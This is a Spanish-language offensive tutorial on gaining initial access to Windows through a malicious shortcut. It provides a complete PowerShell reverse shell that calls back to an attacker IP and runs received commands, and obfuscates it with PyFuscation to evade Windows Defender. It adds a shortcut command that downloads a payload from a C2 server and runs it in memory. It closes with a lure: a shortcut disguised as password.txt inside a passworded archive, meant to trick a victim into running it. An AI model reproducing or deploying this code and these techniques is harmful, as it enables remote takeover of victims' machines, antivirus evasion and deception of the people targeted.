# Acceso inicial mediante acceso directos + powershell

Mediante  este método vamos a poder Bypasear Window Defender para lograr obtener una ReverseShell, vamos a usar para ello un proyecto de Github llamado PyFuscation el cual lograra Obfuscar nuestro Payload Powershell, pero que tal si empezamos.

## Instalación de PyFuscation

```bash
git clone https://github.com/CBHue/PyFuscation.git
```


Vamos a usar un bonito reverseshell escrito en Powershell

```powershell
$socket = new-object System.Net.Sockets.TcpClient('192.168.0.12', 9595);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do{
        $writer.Write("PS $(pwd)> ");
        $writer.Flush();
        $read = $null;
        while($stream.DataAvailable -or ($read = $stream.Read($buffer, 0, 1024)) -eq $null){}
        $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($buffer, 0, $read);
        $sendback = (iex $data 2>&1 | Out-String );
        $sendback2  = $sendback;
        $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
        $writer.Write($sendbyte,0,$sendbyte.Length);
}While ($true);
$writer.close();$socket.close();

```

Bien, ya tenemos el obfuscador y la revershell, vamos a modificar el Script, solo introduce tu ip y el puerto en la primera linea del código.

## Obfuscando Script 

Pasemos a la parte de Obfuscar nuestra ReverseShell...


```bash
python3 PyFuscation.py -fvp --ps rev_shell.ps1
```


## Creando el acceso directo para la ejecución de nuestro Script

Para esta prueba use VirtualBox con Windows 10 mas Windows Defender actualizado y activado.

Vamos crear un acceso directo con la siguiente ruta:

<img src="imgs/2023-10-06_03-54.png">

```cmd
%COMSPEC% /C powershell -Exec bypass -Command iex (New-Object Net.WebClient).DownloadString('http://192.168.0.12:8000/payload.ps1')
```

Lo que hará sera ejecutar nuestro Script Powershell que se encuentra hospedado nuestro servidor C2 y correrlo en memoria obteniendo de esta forma la Shell de la victima.

## Ejemplo de técnica para persuadir a la victima de ejecutar el acceso directo

<img src="2023-10-06_04-41.png">

Vamos a crear un comprimido con contraseña con cualquier dato que desen y luego vamos comprimirlo nuevamente pero con nuestro acceso directo con el nombre password.txt.
